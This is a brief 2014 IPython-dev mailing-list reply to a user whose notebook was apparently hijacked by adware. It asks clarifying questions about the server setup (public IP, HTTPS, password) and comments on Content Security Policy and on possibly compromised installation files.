[IPython-dev] Scorpion saver hijacked my Ipython notebook..

Matthias Bussonnier bussonniermatthias at gmail.com
Wed Jan 1 12:37:14 EST 2014

Hi toby,

Happy new year too, do you mean "tornado" by scorpion ? I'm not sure csp is a solution as people
Tend to inject JavaScript into the notebook on purpose. That beeing said it would be nice to know
How or where your Ipython process have been hijacked if it had been. If the installation files have been modified then it's the security of your all server that is compromised.

Do you run your server on public ip? HTTPS ? With password ?

Envoyé de mon iPhone